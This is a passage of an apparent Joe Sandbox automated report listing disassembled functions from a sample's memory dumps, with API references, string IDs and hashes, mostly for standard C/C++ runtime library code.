                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                                                                                                                      • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                                                                                                      • API String ID: 3042121994-2799312399
                                                                                                                                                                                                                                                                      • Opcode ID: 3cbbc0dd53b7d193b0bc61761a93fe069c63dd17ccc0cf0e657d8e29e2acd675
                                                                                                                                                                                                                                                                      • Instruction ID: 4d37766df30196eb11d7b4bbb2a20bccc582316538ad0dbb74a40b850dd95d32
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cbbc0dd53b7d193b0bc61761a93fe069c63dd17ccc0cf0e657d8e29e2acd675
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3EC19630D0825A8BDF25DF64CA46BBCBBB2BF55314F54809DD485EB282DB348D85EB50
                                                                                                                                                                                                                                                                      Function 00FE1A6D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00FE1AFD
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                      • String ID: pow
                                                                                                                                                                                                                                                                      • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                      • Opcode ID: 7795d0b36ea3bc85fb8ec6e232a63016952886e55b16e0924611454eaac0fddf
                                                                                                                                                                                                                                                                      • Instruction ID: 65e384c583febae4d9d6aa0f9406b4a91cf839c7832214ff3997ebddd93cd471
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7795d0b36ea3bc85fb8ec6e232a63016952886e55b16e0924611454eaac0fddf
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25514B71E09185DACB117B17CD0137A7794BF80B20F304D69E0D5821A9FE3A9C95FA87
                                                                                                                                                                                                                                                                      Function 00FD1E70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: __aulldiv
                                                                                                                                                                                                                                                                      • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                                                                                                      • API String ID: 3732870572-1956417402
                                                                                                                                                                                                                                                                      • Opcode ID: 00a7dd60d03f484bed8719fb5ebf5c8ef9e6558851eadae42cfac1c781bba588
                                                                                                                                                                                                                                                                      • Instruction ID: 50de929baa59c5b296c45e08503077ec152872c57ffd6a0c8b6364c6a00af754
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 00a7dd60d03f484bed8719fb5ebf5c8ef9e6558851eadae42cfac1c781bba588
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F510031F04289AADB258FA888857BEBBB7BF45360F1C405BE891D7341C3749941FB61
                                                                                                                                                                                                                                                                      Function 00FBBD90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00FBBF6E
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                                      • String ID: false$true
                                                                                                                                                                                                                                                                      • API String ID: 118556049-2658103896
                                                                                                                                                                                                                                                                      • Opcode ID: 46375ccb1b61ed047cd758d2ade78d2ce57ae915d9c59f6667b436a51dce39e3
                                                                                                                                                                                                                                                                      • Instruction ID: 98082287415a752c1340a93efc4984f76223ae0457113cc2c50daae19824fca7
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 46375ccb1b61ed047cd758d2ade78d2ce57ae915d9c59f6667b436a51dce39e3
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4251C4B1D003489FDB10DFA5CD41BEEB7B8FF05314F14426AE845AB281E775AA45CB91
                                                                                                                                                                                                                                                                      Function 00FB70A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 149COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID: \\?\$\\?\UNC\
                                                                                                                                                                                                                                                                      • API String ID: 0-3019864461
                                                                                                                                                                                                                                                                      • Opcode ID: 10712abadaa69c700cb701246c7cb9cb3432398418e386a52e8442b6db00733c
                                                                                                                                                                                                                                                                      • Instruction ID: ca1426a865996e7976aa610501c77421f39ae96b7637ec433900a6c79a2fcee3
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10712abadaa69c700cb701246c7cb9cb3432398418e386a52e8442b6db00733c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B519E70A143049BDB14EF6ACC45BEEB7B5FF85314F14451DE441AB280DBB5A984DFA0
                                                                                                                                                                                                                                                                      Function 00FCD4FA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00FCD501
                                                                                                                                                                                                                                                                      • _swprintf.LIBCMT ref: 00FCD573
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC254E: __EH_prolog3.LIBCMT ref: 00FC2555
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC254E: std::_Lockit::_Lockit.LIBCPMT ref: 00FC255F
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00FC25D0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC2FC8: __EH_prolog3.LIBCMT ref: 00FC2FCF
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: H_prolog3Lockitstd::_$H_prolog3_Lockit::_Lockit::~__swprintf
                                                                                                                                                                                                                                                                      • String ID: %.0Lf
                                                                                                                                                                                                                                                                      • API String ID: 3050236999-1402515088
                                                                                                                                                                                                                                                                      • Opcode ID: c2415ecc9936e47c45117dadda14a4fdde77c26dcc871df60b7678fa003146de
                                                                                                                                                                                                                                                                      • Instruction ID: a769011b6281a800aa73935652163a68964ad84e187be105b25203a091bc6a62
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2415ecc9936e47c45117dadda14a4fdde77c26dcc871df60b7678fa003146de
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C419B71E002099BCF05EFD0CD46AED7BB5FF08304F148459E845AB295DB759915EF90
                                                                                                                                                                                                                                                                      Function 00FCD79E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00FCD7A5
                                                                                                                                                                                                                                                                      • _swprintf.LIBCMT ref: 00FCD817
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8657
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8679
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB86A1
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB880E
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                                                                                                                                                                                                      • String ID: %.0Lf
                                                                                                                                                                                                                                                                      • API String ID: 1487807907-1402515088
                                                                                                                                                                                                                                                                      • Opcode ID: 905dbe3f8cdaf2104c177b14071faaa924622f83fa66fdac0800b3dd163ec225
                                                                                                                                                                                                                                                                      • Instruction ID: ed9376ca0b4ced660a803088a9d77593ebf02646600b717f0818272cdec6a96d
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 905dbe3f8cdaf2104c177b14071faaa924622f83fa66fdac0800b3dd163ec225
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78418B72E00209ABCF05EFD0DD45AEE7BB5FF08300F204459E945AB295EB78A915EF90
                                                                                                                                                                                                                                                                      Function 00FD1887 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00FD188E
                                                                                                                                                                                                                                                                      • _swprintf.LIBCMT ref: 00FD1900
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00FB92A0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00FB92C2
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB92EA
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB9422
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                                                                                                                                                                                                                      • String ID: %.0Lf
                                                                                                                                                                                                                                                                      • API String ID: 1487807907-1402515088
                                                                                                                                                                                                                                                                      • Opcode ID: 436c8a30ae4cff9332464e6c195014e21de890625b0d1a85dd83ab06b134582b
                                                                                                                                                                                                                                                                      • Instruction ID: 16c7031a2f625faa62c3f22f324b9de8bf45983e3766fe80dfc3db8b7e1f059a
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 436c8a30ae4cff9332464e6c195014e21de890625b0d1a85dd83ab06b134582b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01413771E00208ABCF05EFD4DC54ADDBBB6FF08300F204549E946AB295DB799A15EF90
                                                                                                                                                                                                                                                                      Function 00FD6059 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00FD607E
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: EncodePointer
                                                                                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                                      • Opcode ID: 57f54a3442cd3242001f3f2ee4e7f6f9c81fee77f05438dc34b542cd789a4224
                                                                                                                                                                                                                                                                      • Instruction ID: 64ff8d1ef35022db51953d5e478f2803d2583112b1ae183c4d2f90ad63e5e41f
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57f54a3442cd3242001f3f2ee4e7f6f9c81fee77f05438dc34b542cd789a4224
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D416871D00209EFCF15DF98CC81AAEBBB6FF48714F19815AF908A7212D3359951EB51
                                                                                                                                                                                                                                                                      Function 00FCDF8F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: H_prolog3___cftoe
                                                                                                                                                                                                                                                                      • String ID: !%x
                                                                                                                                                                                                                                                                      • API String ID: 855520168-1893981228
                                                                                                                                                                                                                                                                      • Opcode ID: e4bbea54ab17ff03880be0a0fa051dc4993dde1a780516b856389e9546b7fe04
                                                                                                                                                                                                                                                                      • Instruction ID: e573b61ccb8cc6691b1c69ef6e5d34c93ab4ff8df4fe9694b7f729072bb0f576
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4bbea54ab17ff03880be0a0fa051dc4993dde1a780516b856389e9546b7fe04
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50315871D0020AABDF04DF94E982BEEB7B6FF48304F10441DF905A7251DB79AA45DB64
                                                                                                                                                                                                                                                                      Function 00FD19FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: H_prolog3___cftoe
                                                                                                                                                                                                                                                                      • String ID: !%x
                                                                                                                                                                                                                                                                      • API String ID: 855520168-1893981228
                                                                                                                                                                                                                                                                      • Opcode ID: bdb4dd7d24e8bc61af56e8c3c13faf71acb162fbf7625e3d79ee0d6902e7834d
                                                                                                                                                                                                                                                                      • Instruction ID: c477bd5ffef94c2328c46b6af19e81cdd486afd471d6971d2f630f58464d67af
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bdb4dd7d24e8bc61af56e8c3c13faf71acb162fbf7625e3d79ee0d6902e7834d
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E313972D15259AFDF05DF94DC41AEEBBB6BF09300F18001AF844A7342D7799A45EBA0
                                                                                                                                                                                                                                                                      Function 00FB5F40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00FB5F86
                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,8F6E4A30), ref: 00FB5FF6
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ConvertFreeLocalString
                                                                                                                                                                                                                                                                      • String ID: Invalid SID
                                                                                                                                                                                                                                                                      • API String ID: 3201929900-130637731
                                                                                                                                                                                                                                                                      • Opcode ID: 28ad464436760a8bc11446c3cdd1e48d6e0e208f9eb0a469b892122027de2a27
                                                                                                                                                                                                                                                                      • Instruction ID: fbabad70265b851a6634fcfeead4f9d153316793c0762a0f73d5f6c09e081526
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28ad464436760a8bc11446c3cdd1e48d6e0e208f9eb0a469b892122027de2a27
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76218C75A046099BDB14DF59C815BBFBBF8EF44B14F100A1EE401A7780D7BAAA04DBD0
                                                                                                                                                                                                                                                                      Function 00FB9070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FB909B
                                                                                                                                                                                                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00FB90FE
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                                                                                                                      • API String ID: 3988782225-1405518554
                                                                                                                                                                                                                                                                      • Opcode ID: 86f3c98ce2bc6b88971024dec0c7dd17f26ff56fabdd04a2cd3d33009c0ac52a
                                                                                                                                                                                                                                                                      • Instruction ID: d79c78da974bdc56541078bc1cc1a5f1240e7c66447ba52d52bd3ee5fa70a79b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 86f3c98ce2bc6b88971024dec0c7dd17f26ff56fabdd04a2cd3d33009c0ac52a
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA210270809784DED321CFA8C904B8BBFF4EF19310F00868DE09997781D7B9A604CBA1
                                                                                                                                                                                                                                                                      Function 00FBF098 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: H_prolog3_
                                                                                                                                                                                                                                                                      • String ID: false$true
                                                                                                                                                                                                                                                                      • API String ID: 2427045233-2658103896
                                                                                                                                                                                                                                                                      • Opcode ID: 4f07fdb0f4cdb3fe7b309b0019efe0e4d72702c16d4dcda1328bac8cc5dd3527
                                                                                                                                                                                                                                                                      • Instruction ID: 1dc80477594feb3c871b7fd6f3a3acc2470af7730a2733c02e8fed2b1121e85b
